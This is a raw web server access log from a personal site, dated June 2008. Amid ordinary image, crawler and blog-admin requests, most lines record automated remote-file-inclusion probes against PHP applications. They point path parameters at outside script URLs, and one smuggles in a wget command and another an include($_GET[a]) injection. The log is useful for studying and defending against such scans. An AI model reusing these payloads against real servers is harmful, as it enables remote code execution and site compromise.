96.229.127.31 - - [08/Jun/2008:10:04:30 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_020M.jpg HTTP/1.1" 200 98199 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:30 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_030M.jpg HTTP/1.1" 200 98194 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:30 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_035M.jpg HTTP/1.1" 200 96763 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:31 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_053M.jpg HTTP/1.1" 200 108392 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:31 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_071M.jpg HTTP/1.1" 200 119050 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:31 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_055M.jpg HTTP/1.1" 200 84400 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:31 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_056M.jpg HTTP/1.1" 200 68291 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:32 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_058M.jpg HTTP/1.1" 200 120428 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:32 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_059M.jpg HTTP/1.1" 200 68572 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:32 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_066M.jpg HTTP/1.1" 200 138730 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:32 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_067M.jpg HTTP/1.1" 200 56379 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:32 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_060M.jpg HTTP/1.1" 200 76230 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:32 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_061M.jpg HTTP/1.1" 200 70278 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:33 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_069M.jpg HTTP/1.1" 200 113088 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:33 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_072M.jpg HTTP/1.1" 200 25828 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:33 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_076M.jpg HTTP/1.1" 200 24103 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.127.31 - - [08/Jun/2008:10:04:33 -0700] "GET /bikes/dteel/2008-05-30/Panarama_CreSTOC_2008M.jpg HTTP/1.1" 200 14593 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
67.195.58.157 - - [08/Jun/2008:10:05:06 -0700] "GET /logs/access_080312.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.202.117.159 - - [08/Jun/2008:10:05:20 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.117.159 - - [08/Jun/2008:10:05:24 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.117.159 - - [08/Jun/2008:10:05:24 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.117.159 - - [08/Jun/2008:10:05:24 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:10:05:31 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:10:05:32 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:10:06:09 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:06:12 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:06:12 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:06:12 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.144.18 - - [08/Jun/2008:10:06:18 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.144.18 - - [08/Jun/2008:10:06:25 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:10:06:27 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.144.18 - - [08/Jun/2008:10:06:34 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.67.79 - - [08/Jun/2008:10:06:44 -0700] "GET /?show=gallery&pageid=17 HTTP/1.1" 200 52730 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
203.157.30.8 - - [08/Jun/2008:10:06:46 -0700] "GET /logs/access_071219.log/components/com_simpleboard/image_upload.php?sbp=http://kiliclub.com/tmp/cmd.htm????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.157.30.8 - - [08/Jun/2008:10:06:46 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://kiliclub.com/tmp/cmd.htm????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.157.30.8 - - [08/Jun/2008:10:06:47 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://kiliclub.com/tmp/cmd.htm????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:10:06:56 -0700] "GET /logs/access_080106.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [08/Jun/2008:10:06:59 -0700] "GET /?show=gallery&pageid=159 HTTP/1.1" 200 52730 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:10:07:03 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:10:07:04 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:10:07:04 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:10:07:15 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:10:07:16 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:10:07:16 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.34.226.62 - - [08/Jun/2008:10:07:56 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [08/Jun/2008:10:08:05 -0700] "GET /logs/access.log/index.php?pagina=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.100.220.39 - - [08/Jun/2008:10:08:45 -0700] "GET /logs/access.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.39 - - [08/Jun/2008:10:08:46 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.37 - - [08/Jun/2008:10:08:46 -0700] "GET /logs/access.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.39 - - [08/Jun/2008:10:08:46 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.37 - - [08/Jun/2008:10:08:46 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.37 - - [08/Jun/2008:10:08:47 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:09:08 -0700] "GET /logs/access_080306.log/?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:09:10 -0700] "GET /?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 200 16846 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:09:11 -0700] "GET /logs/?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 200 50988 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:10:09:14 -0700] "GET /logs/access_080312.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:09:23 -0700] "GET /logs/access_080129.log/?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.157.30.8 - - [08/Jun/2008:10:09:37 -0700] "GET /logs/access_080118.log/components/com_simpleboard/image_upload.php?sbp=http://kiliclub.com/tmp/cmd.htm????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.69.95.221 - - [08/Jun/2008:10:09:38 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
195.69.95.221 - - [08/Jun/2008:10:09:39 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.230.10.251 - - [08/Jun/2008:10:09:56 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Jun/2008:10:09:56 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.202.117.159 - - [08/Jun/2008:10:10:41 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:10:54 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:10:54 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:10:55 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:10:58 -0700] "GET /logs/access_080208.log//becommunity/community/index.php?pageurl=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:10:59 -0700] "GET //becommunity/community/index.php?pageurl=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:10:59 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:10:11:06 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:10:11:06 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:11:06 -0700] "GET /logs/access_080107.log/?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:11:07 -0700] "GET /?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 200 16846 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:11:08 -0700] "GET /logs/?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 200 50988 "-" "libwww-perl/5.808" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:10:11:08 -0700] "GET /logs//calendar.php?p=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:10:11:09 -0700] "GET //calendar.php?p=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:11:17 -0700] "GET /logs/access_080201.log//becommunity/community/index.php?pageurl=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:12:16 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:10:12:26 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:10:12:26 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.100.220.37 - - [08/Jun/2008:10:12:34 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.39 - - [08/Jun/2008:10:12:41 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:12:43 -0700] "GET /logs/access_080312.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:12:48 -0700] "GET /logs/access_080312.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:12:49 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:12:49 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:12:53 -0700] "GET /logs/access_080129.log/?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:13:24 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:13:35 -0700] "GET //becommunity/community/index.php?pageurl=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:10:14:19 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:10:14:23 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:10:14:25 -0700] "GET //include/bbs.lib.inc.php?site_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:10:14:27 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.195.51.236 - - [08/Jun/2008:10:14:37 -0700] "GET /blog/index.php/2008/04/03/hello-world/feed/ HTTP/1.0" 200 996 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
151.11.24.250 - - [08/Jun/2008:10:15:23 -0700] "GET /logs/?mosConfig_absolute_path=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt? HTTP/1.1" 200 50988 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:10:15:24 -0700] "GET /?mosConfig_absolute_path=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt? HTTP/1.1" 200 16892 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:16:14 -0700] "GET /logs/access_080215.log//viewtopic.php?p=762//viewtopic.php?p=45339//html&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:16:14 -0700] "GET //viewtopic.php?p=762//viewtopic.php?p=45339//html&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:16:14 -0700] "GET /logs//viewtopic.php?p=762//viewtopic.php?p=45339//html&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.117.159 - - [08/Jun/2008:10:16:31 -0700] "GET /skin/zero_vote/login.php?dir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:10:16:39 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:10:16:39 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:39 -0700] "GET /blog/wp-admin/comment.php?action=mac&c=17 HTTP/1.1" 200 7977 "http://b6.mail.yahoo.com/ym/dmulk.com/ShowLetter?MsgId=6871_12876174_545_1222_574_0_60152_1033_2793808946&Idx=0&YY=12393&y5beta=yes&y5beta=yes&inc=25&order=down&sort=date&pos=0&view=&head=&box=Blog" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:16:43 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:43 -0700] "GET /blog/wp-admin/comment.php?_wpnonce=44fa35a7b4&_wp_http_referer=%2Fblog%2Fwp-admin%2Fcomment.php%3Faction%3Dmac%26c%3D17&action=approvecomment&p=159&c=17&noredir=1 HTTP/1.1" 302 17 "http://dmulk.com/blog/wp-admin/comment.php?action=mac&c=17" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
